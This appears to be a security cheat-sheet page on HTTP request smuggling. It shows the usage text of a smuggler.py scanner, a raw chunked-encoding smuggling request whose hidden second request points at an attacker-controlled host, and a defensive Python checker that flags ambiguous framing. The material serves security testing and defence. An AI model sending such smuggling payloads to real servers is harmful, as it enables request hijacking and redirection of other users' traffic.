HTTP Request Smuggling

https://portswigger.net/web-security/request-smuggling

# smuggler.py is a small tool used to test for HTTP request smuggling
python smuggler.py -h

                                         _                             
         ___ _ __ ___  _   _  __ _  __ _| | ___ _ __       _ __  _   _ 
        / __| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|     | '_ \| | | |
        \__ \ | | | | | |_| | (_| | (_| | |  __/ |     _  | |_) | |_| |
        |___/_| |_| |_|\__,_|\__, |\__, |_|\___|_|    (_) | .__/ \__, |
                             |___/ |___/                  |_|    |___/ 

                        by @gwendallecoguic


usage: smuggler.py [-h] [-a PATH] [-d HEADER] [-i TIMEOUT] [-m METHOD]
                   [-o HOSTS] [-s SCHEME] [-t THREADS] [-u URLS] [-v VERBOSE]

optional arguments:
  -h, --help            show this help message and exit
  -a PATH, --path PATH  set paths list
  -d HEADER, --header HEADER
                        custom headers
  -i TIMEOUT, --timeout TIMEOUT
                        set timeout, default 10
  -m METHOD, --method METHOD
                        set methods separated by comma, default: all
  -o HOSTS, --hosts HOSTS
                        set host list (required or -u)
  -s SCHEME, --scheme SCHEME
                        scheme to use, default: http,https
  -t THREADS, --threads THREADS
                        threads, default 10
  -u URLS, --urls URLS  set url list (required or -o)
  -v VERBOSE, --verbose VERBOSE
                        display output, 0=nothing, 1=only vulnerable, 2=all
                        requests, 3=requests+headers, 4=full debug, default: 1

Redirecting to Owned host

https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142

# The first request uses Transfer-Encoding: chunked
# It is followed by a second request, toward a controlled domain
# You can use Burp Collaborator to prove it

POST /xxxx HTTP/1.1
Transfer-Encoding: chunked
Host: www.target.com
...

data
0

GET /somefile HTTP/1.1
Host: myserv.com
X-Ignore: X
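
A defender-side check for the framing ambiguity the request above relies on. This is an added example, not code from smuggler.py or from the linked articles. It assumes the input is one message as delimited by a front end that frames by Content-Length; the function names and the example hosts are hypothetical.

```python
import re

REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]\r?$", re.M)
HEX = re.compile(rb"[0-9A-Fa-f]+")

def after_last_chunk(body):
    """Walk a chunked body; return bytes left after the 0-size chunk, None if malformed."""
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        size_field = body[pos:eol].split(b";")[0] if eol >= 0 else b""
        if not HEX.fullmatch(size_field):
            return None
        if int(size_field, 16) == 0:
            end = body.find(b"\r\n\r\n", pos)      # skips any trailer fields
            return None if end < 0 else body[end + 4:]
        pos = eol + 2 + int(size_field, 16) + 2    # size line, chunk data, CRLF
        if body[pos - 2:pos] != b"\r\n":
            return None

def framing_findings(raw):
    """Findings for ONE message, cut out by a front end that framed it by Content-Length."""
    head, _, body = raw.partition(b"\r\n\r\n")
    pairs = [ln.partition(b":")[::2] for ln in head.split(b"\r\n")[1:]]
    te = [v.strip().lower() for n, v in pairs if n.strip().lower() == b"transfer-encoding"]
    cl = {v.strip() for n, v in pairs if n.strip().lower() == b"content-length"}
    out = []
    if any(n != n.strip() for n, _ in pairs):
        out.append("whitespace in header name")
    if te and cl:
        out.append("Content-Length and Transfer-Encoding both present")
    if len(cl) > 1:
        out.append("conflicting Content-Length values")
    if te and te != [b"chunked"]:
        out.append("non-canonical Transfer-Encoding")
    if te:
        rest = after_last_chunk(body)
        if rest is None:
            out.append("malformed chunked body")
        elif REQUEST_LINE.search(rest):
            out.append("request line after terminating chunk")
    return out

# Constructed samples (hosts are placeholders), modelled on the request shown above.
CHUNKS = b"4\r\ndata\r\n0\r\n\r\n"
EXTRA = b"GET /somefile HTTP/1.1\r\nHost: other.example\r\nX-Ignore: X"
HEAD = b"POST /xxxx HTTP/1.1\r\nHost: www.example.com\r\nTransfer-Encoding: chunked\r\n"
CLEAN = HEAD + b"\r\n" + CHUNKS
AMBIGUOUS = HEAD + b"Content-Length: %d\r\n\r\n" % len(CHUNKS + EXTRA) + CHUNKS + EXTRA
```

`framing_findings(CLEAN)` returns an empty list, while `framing_findings(AMBIGUOUS)` reports the header conflict and the embedded request line. A front end that rejects any message with a non-empty result removes the disagreement a back end could otherwise act on.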